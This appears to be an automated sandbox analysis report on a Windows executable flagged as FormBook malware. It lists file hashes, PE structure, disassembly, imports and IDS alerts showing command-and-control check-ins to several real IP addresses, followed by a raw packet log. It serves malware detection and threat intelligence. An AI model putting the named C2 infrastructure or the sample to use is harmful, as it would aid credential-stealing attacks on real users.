                                                    MD5:a3356244cc31500c395570f65839865d
                                                    SHA1:6dc52c136f3bf36f6addd123093cf9a1ce27c00f
                                                    SHA256:d2934dafa20010b814ef03d80e356d61ca23e54d1b6ec551d60bfe550c7dcd43
                                                    SHA512:aee36cda01756f1b4e66a6d2ecae15735df0ec4d7bf691e8e3f5a75ffc98e257cdeab2b9305a03caa1b05876e0a568433409795a65c5528198edbf039badef55
                                                    SSDEEP:24576:6qDEvCTbMWu7rQYlBQcBiT6rprG8aL720azMMpPlCOmsUfk2QUw:6TvC/MTQYxsWR7aLpaRJ2QU
                                                    TLSH:AC75E00273C1C022FF9B91734F5AF6515ABC6A260523E62F13981DB9BE701B1563E7A3
                                                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                    File Icon

                                                    Icon Hash:aaf3e3e3938382a0

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x420577
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x67817D4B [Fri Jan 10 20:04:27 2025 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:1
                                                    File Version Major:5
                                                    File Version Minor:1
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:1
                                                    Import Hash:948cc502fe9226992dce9417f952fce3

                                                    Entrypoint Preview

                                                    Instruction
                                                    call 00007FB4F51B6313h
                                                    jmp 00007FB4F51B5C1Fh
                                                    push ebp
                                                    mov ebp, esp
                                                    push esi
                                                    push dword ptr [ebp+08h]
                                                    mov esi, ecx
                                                    call 00007FB4F51B5DFDh
                                                    mov dword ptr [esi], 0049FDF0h
                                                    mov eax, esi
                                                    pop esi
                                                    pop ebp
                                                    retn 0004h
                                                    and dword ptr [ecx+04h], 00000000h
                                                    mov eax, ecx
                                                    and dword ptr [ecx+08h], 00000000h
                                                    mov dword ptr [ecx+04h], 0049FDF8h
                                                    mov dword ptr [ecx], 0049FDF0h
                                                    ret
                                                    push ebp
                                                    mov ebp, esp
                                                    push esi
                                                    push dword ptr [ebp+08h]
                                                    mov esi, ecx
                                                    call 00007FB4F51B5DCAh
                                                    mov dword ptr [esi], 0049FE0Ch
                                                    mov eax, esi
                                                    pop esi
                                                    pop ebp
                                                    retn 0004h
                                                    and dword ptr [ecx+04h], 00000000h
                                                    mov eax, ecx
                                                    and dword ptr [ecx+08h], 00000000h
                                                    mov dword ptr [ecx+04h], 0049FE14h
                                                    mov dword ptr [ecx], 0049FE0Ch
                                                    ret
                                                    push ebp
                                                    mov ebp, esp
                                                    push esi
                                                    mov esi, ecx
                                                    lea eax, dword ptr [esi+04h]
                                                    mov dword ptr [esi], 0049FDD0h
                                                    and dword ptr [eax], 00000000h
                                                    and dword ptr [eax+04h], 00000000h
                                                    push eax
                                                    mov eax, dword ptr [ebp+08h]
                                                    add eax, 04h
                                                    push eax
                                                    call 00007FB4F51B89BDh
                                                    pop ecx
                                                    pop ecx
                                                    mov eax, esi
                                                    pop esi
                                                    pop ebp
                                                    retn 0004h
                                                    lea eax, dword ptr [ecx+04h]
                                                    mov dword ptr [ecx], 0049FDD0h
                                                    push eax
                                                    call 00007FB4F51B8A08h
                                                    pop ecx
                                                    ret
                                                    push ebp
                                                    mov ebp, esp
                                                    push esi
                                                    mov esi, ecx
                                                    lea eax, dword ptr [esi+04h]
                                                    mov dword ptr [esi], 0049FDD0h
                                                    push eax
                                                    call 00007FB4F51B89F1h
                                                    test byte ptr [ebp+08h], 00000001h
                                                    pop ecx

                                                    Rich Headers

                                                    Programming Language:
                                                    • [ C ] VS2008 SP1 build 30729
                                                    • [IMP] VS2008 SP1 build 30729

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000xb3e18.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1880000x7594.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0xd40000xb3e180xb4000d6caf47d310df6ff9e8135786e08cfcfFalse0.9632310655381945data7.962992737543316IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x1880000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                    RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                    RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                    RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                    RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                    RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                    RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                    RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                    RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                    RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                    RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                    RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                    RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                    RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                    RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                    RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                    RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                    RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                    RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                    RT_RCDATA0xdc7b80xab0e0data1.0003154258963234
                                                    RT_GROUP_ICON0x1878980x76dataEnglishGreat Britain0.6610169491525424
                                                    RT_GROUP_ICON0x1879100x14dataEnglishGreat Britain1.25
                                                    RT_GROUP_ICON0x1879240x14dataEnglishGreat Britain1.15
                                                    RT_GROUP_ICON0x1879380x14dataEnglishGreat Britain1.25
                                                    RT_VERSION0x18794c0xdcdataEnglishGreat Britain0.6181818181818182
                                                    RT_MANIFEST0x187a280x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                    Imports

                                                    DLLImport
                                                    WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                    VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                    MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                    WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                    PSAPI.DLLGetProcessMemoryInfo
                                                    IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                    USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                    UxTheme.dllIsThemeActive
                                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                    USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                    GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                    SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                    OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                    Possible Origin

                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishGreat Britain

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2025-01-13T09:34:24.097632+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649984172.65.235.9780TCP
                                                    2025-01-13T09:34:24.097632+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649984172.65.235.9780TCP
                                                    2025-01-13T09:34:39.665187+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649988192.64.119.10980TCP
                                                    2025-01-13T09:34:42.204787+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649989192.64.119.10980TCP
                                                    2025-01-13T09:34:44.760919+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649990192.64.119.10980TCP
                                                    2025-01-13T09:34:47.304477+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649991192.64.119.10980TCP
                                                    2025-01-13T09:34:47.304477+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649991192.64.119.10980TCP
                                                    2025-01-13T09:34:53.467199+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649992188.114.96.380TCP
                                                    2025-01-13T09:34:55.999758+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649993188.114.96.380TCP
                                                    2025-01-13T09:34:59.627388+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649994188.114.96.380TCP
                                                    2025-01-13T09:35:02.158009+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649996188.114.96.380TCP
                                                    2025-01-13T09:35:02.158009+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649996188.114.96.380TCP
                                                    2025-01-13T09:35:08.890663+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64999747.83.1.9080TCP
                                                    2025-01-13T09:35:11.437644+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64999847.83.1.9080TCP
                                                    2025-01-13T09:35:13.984667+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64999947.83.1.9080TCP
                                                    2025-01-13T09:35:16.629412+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65000047.83.1.9080TCP
                                                    2025-01-13T09:35:16.629412+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65000047.83.1.9080TCP
                                                    2025-01-13T09:35:38.388391+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650002162.0.236.16980TCP
                                                    2025-01-13T09:35:40.969633+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650003162.0.236.16980TCP
                                                    2025-01-13T09:35:43.514733+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650004162.0.236.16980TCP
                                                    2025-01-13T09:35:46.127444+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650005162.0.236.16980TCP
                                                    2025-01-13T09:35:46.127444+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650005162.0.236.16980TCP
                                                    2025-01-13T09:35:52.390025+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650006192.186.58.3180TCP
                                                    2025-01-13T09:35:54.999329+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650007192.186.58.3180TCP
                                                    2025-01-13T09:35:57.536619+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650008192.186.58.3180TCP
                                                    2025-01-13T09:36:00.142014+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650009192.186.58.3180TCP
                                                    2025-01-13T09:36:00.142014+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650009192.186.58.3180TCP
                                                    2025-01-13T09:36:07.298525+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650010104.21.16.180TCP
                                                    2025-01-13T09:36:09.839688+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650011104.21.16.180TCP
                                                    2025-01-13T09:36:12.416985+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650012104.21.16.180TCP
                                                    2025-01-13T09:36:14.943423+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650013104.21.16.180TCP
                                                    2025-01-13T09:36:14.943423+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650013104.21.16.180TCP

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 13, 2025 09:34:23.205662012 CET4998480192.168.2.6172.65.235.97
                                                    Jan 13, 2025 09:34:23.210530996 CET8049984172.65.235.97192.168.2.6
                                                    Jan 13, 2025 09:34:23.210807085 CET4998480192.168.2.6172.65.235.97
                                                    Jan 13, 2025 09:34:23.221297979 CET4998480192.168.2.6172.65.235.97
                                                    Jan 13, 2025 09:34:23.226130962 CET8049984172.65.235.97192.168.2.6
                                                    Jan 13, 2025 09:34:24.093806028 CET8049984172.65.235.97192.168.2.6
                                                    Jan 13, 2025 09:34:24.095870972 CET8049984172.65.235.97192.168.2.6
                                                    Jan 13, 2025 09:34:24.097631931 CET4998480192.168.2.6172.65.235.97
                                                    Jan 13, 2025 09:34:24.099517107 CET4998480192.168.2.6172.65.235.97
                                                    Jan 13, 2025 09:34:24.104343891 CET8049984172.65.235.97192.168.2.6
                                                    Jan 13, 2025 09:34:39.172652006 CET4998880192.168.2.6192.64.119.109
                                                    Jan 13, 2025 09:34:39.177464962 CET8049988192.64.119.109192.168.2.6
                                                    Jan 13, 2025 09:34:39.177561998 CET4998880192.168.2.6192.64.119.109
                                                    Jan 13, 2025 09:34:39.194005966 CET4998880192.168.2.6192.64.119.109
                                                    Jan 13, 2025 09:34:39.198784113 CET8049988192.64.119.109192.168.2.6
                                                    Jan 13, 2025 09:34:39.665046930 CET8049988192.64.119.109192.168.2.6
                                                    Jan 13, 2025 09:34:39.665076017 CET8049988192.64.119.109192.168.2.6
                                                    Jan 13, 2025 09:34:39.665186882 CET4998880192.168.2.6192.64.119.109
                                                    Jan 13, 2025 09:34:40.703346968 CET4998880192.168.2.6192.64.119.109
                                                    Jan 13, 2025 09:34:41.722330093 CET4998980192.168.2.6192.64.119.109
                                                    Jan 13, 2025 09:34:41.727372885 CET8049989192.64.119.109192.168.2.6
                                                    Jan 13, 2025 09:34:41.727536917 CET4998980192.168.2.6192.64.119.109
                                                    Jan 13, 2025 09:34:41.743571043 CET4998980192.168.2.6192.64.119.109
                                                    Jan 13, 2025 09:34:41.748466969 CET8049989192.64.119.109192.168.2.6
                                                    Jan 13, 2025 09:34:42.204600096 CET8049989192.64.119.109192.168.2.6
                                                    Jan 13, 2025 09:34:42.204663038 CET8049989192.64.119.109192.168.2.6
                                                    Jan 13, 2025 09:34:42.204787016 CET4998980192.168.2.6192.64.119.109
                                                    Jan 13, 2025 09:34:43.250236034 CET4998980192.168.2.6192.64.119.109
                                                    Jan 13, 2025 09:34:44.269126892 CET4999080192.168.2.6192.64.119.109
                                                    Jan 13, 2025 09:34:44.274029970 CET8049990192.64.119.109192.168.2.6
                                                    Jan 13, 2025 09:34:44.274153948 CET4999080192.168.2.6192.64.119.109
                                                    Jan 13, 2025 09:34:44.289352894 CET4999080192.168.2.6192.64.119.109
                                                    Jan 13, 2025 09:34:44.294329882 CET8049990192.64.119.109192.168.2.6
                                                    Jan 13, 2025 09:34:44.294368982 CET8049990192.64.119.109192.168.2.6
                                                    Jan 13, 2025 09:34:44.760562897 CET8049990192.64.119.109192.168.2.6
                                                    Jan 13, 2025 09:34:44.760746002 CET8049990192.64.119.109192.168.2.6
                                                    Jan 13, 2025 09:34:44.760919094 CET4999080192.168.2.6192.64.119.109
                                                    Jan 13, 2025 09:34:45.797034025 CET4999080192.168.2.6192.64.119.109
                                                    Jan 13, 2025 09:34:46.815944910 CET4999180192.168.2.6192.64.119.109
                                                    Jan 13, 2025 09:34:46.820964098 CET8049991192.64.119.109192.168.2.6
                                                    Jan 13, 2025 09:34:46.821116924 CET4999180192.168.2.6192.64.119.109
                                                    Jan 13, 2025 09:34:46.830308914 CET4999180192.168.2.6192.64.119.109
                                                    Jan 13, 2025 09:34:46.835129023 CET8049991192.64.119.109192.168.2.6
                                                    Jan 13, 2025 09:34:47.303967953 CET8049991192.64.119.109192.168.2.6
                                                    Jan 13, 2025 09:34:47.304228067 CET8049991192.64.119.109192.168.2.6
                                                    Jan 13, 2025 09:34:47.304476976 CET4999180192.168.2.6192.64.119.109
                                                    Jan 13, 2025 09:34:47.307622910 CET4999180192.168.2.6192.64.119.109
                                                    Jan 13, 2025 09:34:47.312531948 CET8049991192.64.119.109192.168.2.6
                                                    Jan 13, 2025 09:34:52.332149029 CET4999280192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:34:52.337012053 CET8049992188.114.96.3192.168.2.6
                                                    Jan 13, 2025 09:34:52.337110043 CET4999280192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:34:52.357657909 CET4999280192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:34:52.362514019 CET8049992188.114.96.3192.168.2.6
                                                    Jan 13, 2025 09:34:53.467041969 CET8049992188.114.96.3192.168.2.6
                                                    Jan 13, 2025 09:34:53.467108011 CET8049992188.114.96.3192.168.2.6
                                                    Jan 13, 2025 09:34:53.467199087 CET4999280192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:34:53.467374086 CET8049992188.114.96.3192.168.2.6
                                                    Jan 13, 2025 09:34:53.467430115 CET4999280192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:34:53.860434055 CET4999280192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:34:54.878520012 CET4999380192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:34:54.883383036 CET8049993188.114.96.3192.168.2.6
                                                    Jan 13, 2025 09:34:54.883508921 CET4999380192.168.2.6188.114.96.3
